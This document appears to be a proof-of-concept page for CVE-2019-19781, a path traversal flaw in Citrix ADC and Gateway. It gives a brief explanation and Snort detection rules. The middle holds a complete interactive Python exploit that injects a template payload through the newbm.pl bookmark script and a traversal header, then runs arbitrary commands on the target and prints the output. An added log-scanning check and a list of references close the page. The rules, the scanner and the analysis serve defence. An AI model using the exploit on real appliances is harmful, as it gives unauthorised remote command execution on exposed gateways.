CVE-2019-19781 PoC: Citrix Application Delivery Controller and Citrix Systems Gateway Path Traversal Vulnerability

Associated Vulnerability
Title: Citrix Application Delivery Controller and Citrix Systems Gateway Path Traversal Vulnerability (CVE-2019-19781)
Description:An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
Description
RCE, Citrix ADC and Gateway Directory Traversal
Readme
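This write-up covers the Citrix ADC and Gateway directory traversal remote code execution (RCE) vulnerability registered as CVE-2019-19781.
The remote code execution vulnerability arises because requests for the smb.conf file through ../vpns under the /vpn path are not properly validated.
An attacker can steal system configuration or server information.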

1. Citrix
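- An American multinational software company founded in 1989
- Provides server, application and desktop virtualization, networking, SaaS, and cloud computing technologies
- A directory traversal vulnerability caused by insufficient input validation in vulnerable Citrix products
- The vulnerability arises because the requested path is used directly, without validating the input
- In vulnerable versions of Citrix products, the /vpns/ path contains Perl scripts that can access restricted files, including directories, without authentication
- These Perl scripts use the requested path directly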
## path delete
- Block requests that contain /../ and requests that attempt to access the /vpns/ directory

## POC CODE
```snort

alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt"; flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"/../"; http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)

alert tcp any any -> any $HTTP_PORTS (msg:"SERVER-WEBAPP Citrix ADC and Gateway arbitrary code execution attempt"; flow:to_server,established; content:"/vpns/"; fast_pattern:only; content:"/vpns/"; http_raw_uri; content:"%2E%2E"; http_raw_uri; reference:cve,2019-19781; reference:url,support.citrix.com/article/CTX267027;)
```

```python
#!/usr/bin/env python
import requests
import string
import random
import re
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

print("CVE-2019-19781 - Remote Code Execution in Citrix Application Delivery Controller and Citrix Gateway")
print("Found by Mikhail Klyuchnikov")
print("")

if len(sys.argv) < 2:
  print("[-] No URL provided")
  sys.exit(0)

while True:
    try:
      command = input("command > ")

      random_xml = ''.join(random.choices(string.ascii_uppercase + string.digits, k=12))
      print("[+] Adding bookmark", random_xml + ".xml")

      burp0_url = sys.argv[1] + "/vpn/../vpns/portal/scripts/newbm.pl"
      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
                      random_xml, "NSC_NONCE": "c", "Connection": "close"}
      burp0_data = {"url": "http://exemple.com", "title": "[%t=template.new({'BLOCK'='print `" + str(command) + "`'})%][ % t % ]", "desc": "test", "UI_inuse": "RfWeb"}
      r = requests.post(burp0_url, headers=burp0_headers, data=burp0_data,verify=False)

      if r.status_code == 200:
        print("[+] Bookmark added")
      else:
        print("\n[-] Target not vulnerable or something went wrong")
        sys.exit(0)

      burp0_url = sys.argv[1] + "/vpns/portal/" + random_xml + ".xml"
      burp0_headers = {"NSC_USER": "../../../../netscaler/portal/templates/" +
                       random_xml, "NSC_NONCE": "c", "Connection": "close"}
      r = requests.get(burp0_url, headers=burp0_headers,verify=False)

      replaced = re.sub('^&#.*&#10;$', '', r.text, flags=re.MULTILINE)
      print("[+] Result of the command: \n")
      print(replaced)

    except KeyboardInterrupt:
            print("Exiting...")
            break
```
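
The following Python log check is an added example, not code from the original README or the referenced repositories. It applies the URI conditions of the two Snort rules above to access-log lines after percent-decoding (which also covers lowercase and partial encodings, a generalization beyond the rules as written), and it flags a `.xml` fetch under /vpns/portal/ that follows a newbm.pl POST from the same client, the request pair the script above issues and whose second request carries no traversal in its URI. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in combined log format; IPs are documentation ranges.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Jan/2020:03:14:07 +0000] "POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1" 200 143
198.51.100.7 - - [10/Jan/2020:03:14:08 +0000] "GET /vpns/portal/AB12CD34EF56.xml HTTP/1.1" 200 512
203.0.113.20 - - [10/Jan/2020:03:15:00 +0000] "GET /vpn/%2e%2e/vpns/portal/scripts/newbm.pl HTTP/1.1" 200 88
192.0.2.44 - - [10/Jan/2020:03:16:00 +0000] "GET /vpn/index.html HTTP/1.1" 200 9000
192.0.2.45 - - [10/Jan/2020:03:17:00 +0000] "GET /vpns/portal/homepage.xml HTTP/1.1" 403 0
"""

# client, method, raw request URI, status (assumed log layout)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "([A-Z]+) (\S+) [^"]*" (\d{3})')


def is_traversal(raw_uri):
    """Snort rule conditions: /vpns/ plus /../ in the URI, checked after decoding."""
    decoded = unquote(raw_uri).lower()
    return "/vpns/" in decoded and "/../" in decoded


def scan(log_text):
    """Return (client, reason, raw_uri) findings in log order."""
    findings, wrote_bookmark = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, method, uri, status = m.groups()
        path = unquote(uri).lower().split("?", 1)[0]
        if is_traversal(uri):
            findings.append((client, "traversal", uri))
        if method == "POST" and path.endswith("/newbm.pl") and status == "200":
            # Remember clients whose bookmark write succeeded.
            wrote_bookmark.add(client)
        elif (method == "GET" and client in wrote_bookmark
              and re.fullmatch(r"/vpns/portal/[^/]+\.xml", path)):
            # This URI has no traversal, so the URI rules alone miss it.
            findings.append((client, "xml-fetch-after-newbm", uri))
    return findings


if __name__ == "__main__":
    for client, reason, uri in scan(SAMPLE_LOG):
        print(f"{client}\t{reason}\t{uri}")
```

The NSC_USER header that carries the traversal in the script above is not recorded in a default access log, which is why the second check correlates requests per client instead of inspecting headers.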

## References

- https://nvd.nist.gov/vuln/detail/CVE-2019-19781

- https://github.com/mpgn/CVE-2019-19781

- https://github.com/jas502n/CVE-2019-19781

- https://www.cisa.gov/uscert/ncas/alerts/aa20-031a

- https://www.boho.or.kr/data/secNoticeView.do?bulletin_writing_sequence=35250&queryString=cGFnZT0xJnNvcnRfY29kZT0mc29ydF9jb2RlX25hbWU9JnNlYXJjaF9zb3J0PWRpc3BsYXlfY29udGVudHMmc2VhcmNoX3dvcmQ9Q1ZFLTIwMTktMTk3ODE=

- https://support.citrix.com/article/CTX267027/cve201919781-vulnerability-in-citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance

- https://support.citrix.com/article/CTX276688/citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance-security-update

- https://www.tripwire.com/state-of-security/citrix-netscaler-cve-2019-19781-what-you-need-to-know

- https://www.tenable.com/blog/cve-2019-19781-exploit-scripts-for-remote-code-execution-vulnerability-in-citrix-adc-and

- https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-citrix-adc-and-citrix-gateway-directory-traversal-vulnerability-cve-2019-19781/